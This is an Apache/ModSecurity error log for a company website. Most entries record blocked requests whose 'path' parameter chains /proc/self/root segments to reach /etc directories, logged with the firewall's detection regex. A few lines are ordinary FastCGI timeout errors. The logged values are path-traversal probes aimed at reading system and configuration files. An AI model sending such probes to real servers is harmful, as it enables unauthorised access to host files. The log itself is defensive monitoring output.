[Thu Mar 19 14:34:44.431414 2026] [:error] [pid 7545:tid 140411599251200] [client 74.7.243.128:42778] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwztH8B84UptSoTJtYq6QAAAZE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 14:34:47.330432 2026] [:error] [pid 17653:tid 140411666392832] [client 74.7.241.31:36978] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwzt8df6f5d65gmYZSWPQAAAsk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 14:34:48.121800 2026] [proxy_fcgi:error] [pid 26799:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:37406] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:34:48.839159 2026] [:error] [pid 7893:tid 140411582465792] [client 74.7.243.128:42784] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwzuBCii7xarUs8iHYFLAAAAhM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 14:34:51.262966 2026] [:error] [pid 30077:tid 140411649607424] [client 74.7.241.31:45166] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwzu_u8EFLIOrSqIpvEdQAAAks"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 14:34:53.011753 2026] [:error] [pid 30077:tid 140411674785536] [client 74.7.241.31:45166] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwzvfu8EFLIOrSqIpvEdgAAAkg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 14:34:56.546867 2026] [:error] [pid 8307:tid 140411565680384] [client 74.7.243.128:55016] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwzwL-FhjpZGs9ba8qGvwAAAxU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 14:34:58.570979 2026] [:error] [pid 26799:tid 140411624429312] [client 74.7.243.128:55022] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwzwta6ubjKNq_cu4ZyfQAAA04"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 14:35:00.364944 2026] [:error] [pid 7235:tid 140411699963648] [client 74.7.243.128:51578] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwzxPqxLDW4GITHUkSEdQAAAQU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 14:35:00.818547 2026] [:error] [pid 15826:tid 140411632822016] [client 74.7.241.31:45170] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwzxOoXxyEfFpUF8f8oTQAAAU0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 14:35:07.112984 2026] [:error] [pid 27293:tid 140411658000128] [client 74.7.243.128:51590] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwzy_-YZRR_7pZ7nDKnQAAAA8o"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 14:35:11.125778 2026] [proxy_fcgi:error] [pid 7545:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:37892] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:35:13.652752 2026] [:error] [pid 17887:tid 140411616036608] [client 74.7.241.31:57554] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwz0QkwaGbbGflqUZDlagAAAM8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 14:35:18.922724 2026] [:error] [pid 27293:tid 140411666392832] [client 74.7.243.128:51590] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwz1v-YZRR_7pZ7nDKnRQAAA8k"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 14:35:22.123787 2026] [:error] [pid 17887:tid 140411683178240] [client 74.7.243.128:33630] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwz2gkwaGbbGflqUZDlbQAAAMc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 14:35:24.744953 2026] [:error] [pid 14269:tid 140411632822016] [client 74.7.243.128:33634] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwz3AbLMZ6AikZjR9V5WwAAAA0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 14:35:28.508036 2026] [:error] [pid 7235:tid 140411574073088] [client 74.7.243.128:33644] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwz4PqxLDW4GITHUkSEfgAAARQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 14:35:34.491426 2026] [:error] [pid 8307:tid 140411548894976] [client 74.7.241.31:46644] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwz5r-FhjpZGs9ba8qGywAAAxc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 14:35:37.045892 2026] [proxy_fcgi:error] [pid 17887:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:38518] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:35:37.509028 2026] [:error] [pid 7235:tid 140411708356352] [client 74.7.241.31:43398] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwz6fqxLDW4GITHUkSEggAAAQQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 14:35:38.224514 2026] [:error] [pid 7235:tid 140411691570944] [client 74.7.243.128:33644] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwz6vqxLDW4GITHUkSEgwAAAQY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 14:35:50.574699 2026] [:error] [pid 17887:tid 140411733534464] [client 74.7.243.128:33110] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwz9gkwaGbbGflqUZDlhQAAAME"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 14:35:58.071216 2026] [:error] [pid 17887:tid 140411607643904] [client 74.7.243.128:33110] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwz_gkwaGbbGflqUZDlhwAAANA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 14:36:01.598729 2026] [:error] [pid 17887:tid 140411725141760] [client 74.7.243.128:33110] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw0AQkwaGbbGflqUZDliAAAAMI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 14:36:03.129857 2026] [proxy_fcgi:error] [pid 14269:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:39122] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:36:30.955150 2026] [mime_magic:error] [pid 15826:tid 140411733534464] (70014)End of file found: [client 57.141.18.64:43678] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 14:36:32.130798 2026] [proxy_fcgi:error] [pid 30077:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:39860] AH01075: Error dispatching request to : (polling)
